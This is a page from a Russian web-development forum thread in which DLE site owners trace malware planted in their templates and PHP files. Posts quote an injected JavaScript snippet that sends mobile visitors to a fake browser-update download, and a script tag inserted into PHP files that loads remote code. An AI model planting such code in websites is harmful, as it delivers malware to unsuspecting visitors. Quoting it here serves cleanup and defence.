Форум Сайтостроение Безопасность

Вирус на сайте cms dle

1... 505152535455565758 ...61
ProLiant
На сайте с 07.12.2005
Offline
249
ProLiant
#531
Сюзерен:
Здравствуйте. У меня проблема стоит шаблон стандартный все норм, меняю другой шаблон появляются перенаправление, не нашёл где-то код. 😕
вот шаблон http://yadi.sk/d/okl922Fc69LVe

В шаблоне вроде все чисто, глянул бегло. А перенаправление надо искать в файлах двига, в index.php и .htaccess для начала посмотрите внимательно. Либо скачайте айболита http://www.revisium.com/ai/ и им поищите...

Выбирай оптимальный хостинг (http://cp.inferno.name/aff.php?aff=2053) для стабильного заработка на файловом трафе (https://espays.com/s.php?f=38). ;)
K5
На сайте с 21.07.2010
Offline
209
kgtu5
#532

ProLiant, это не бросилось в глаза

if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone)/i)!==null){
window.location = "http://file0a. net/browser_update/u/7357/browser_update. auto";
}

???

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!
С
На сайте с 24.06.2013
Offline
0
Сюзерен
#533

kgtu5, где вы нашли?

---------- Добавлено 25.06.2013 в 14:43 ----------

ProLiant, искал, ничего не нашёл, думаю где-то в шаблоне вирус. Попробую айболита.

---------- Добавлено 25.06.2013 в 16:35 ----------

ProLiant, не помогло, где надо искать?😕

ProLiant
На сайте с 07.12.2005
Offline
249
ProLiant
#534
kgtu5:
ProLiant, это не бросилось в глаза

???

Что-то этого не видел, в main.tpl точно (по скаченному архиву файлов шаблона)! Такое бы точно бросилось в глаза. Где увидели?

---------- Добавлено 25.06.2013 в 19:04 ----------

Сюзерен, Попробуйте по всем файлам двига и шаблонов поиском по фрагменту текста "file0a". Раз нашли такое... Я что-то пропустил наверное. (

тема WordPress WLW.su - полный песец Reg.ru и частичная оплата
K5
На сайте с 21.07.2010
Offline
209
kgtu5
#535

ProLiant, Сюзерен, /js/sample01.js смотрите, в майн.тпл объявлен

ProLiant
На сайте с 07.12.2005
Offline
249
ProLiant
#536

kgtu5, Да, точно. :)

vlad00777
На сайте с 24.12.2009
Offline
119
vlad00777
#537

Сегодня опять нашел у себя вирус, теперь так:

Прописался в файлах php, например в файле ai-bolit.php , да именно в файл проверяльщика вставился код, естественно айболит ничего не сказал, вставили вот:

<script language="JavaScript" src="http://www.insightcrime.org/media/system/js/jquery-1.6.5.min.js" type="text/javascript"></script>
Верстка. Качественно! Адаптивная, резиновая, с параллаксом и прочими плюшками. В ЛС.
S
На сайте с 06.08.2010
Offline
22
sanchosmavrody
#538

/ru/forum/799040 создал тему для защиты DLE от взлома. ☝

E
На сайте с 09.01.2008
Offline
61
Exquisitor
#539

http://iknopo.ru/iknopo_b.js здесь. соцкнопки в 9.8

валяются здесь /engine/classes/js/dle_js.js

и в шаблонах fullstory.tpl остатки, работа этих соц позывов выводится

V8
На сайте с 08.01.2013
Offline
10
vladik865
#540
Exquisitor:
http://iknopo.ru/iknopo_b.js здесь. соцкнопки в 9.8

валяются здесь /engine/classes/js/dle_js.js

и в шаблонах fullstory.tpl остатки, работа этих соц позывов выводится

та же проблема, стоит дли 10. не могу найти этот код нигде, тему читал все файлы прочисал ничего нет... но в шаблоне сайта js (в исходнике) есть, а в main.tpl нет. где искать подскажите.

сайт - http://sceu.pp.ua/

В ДЛИ стоит фейковый Вероятно вирус на сайте. Непонятный редирект от гугла
1... 505152535455565758 ...61

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий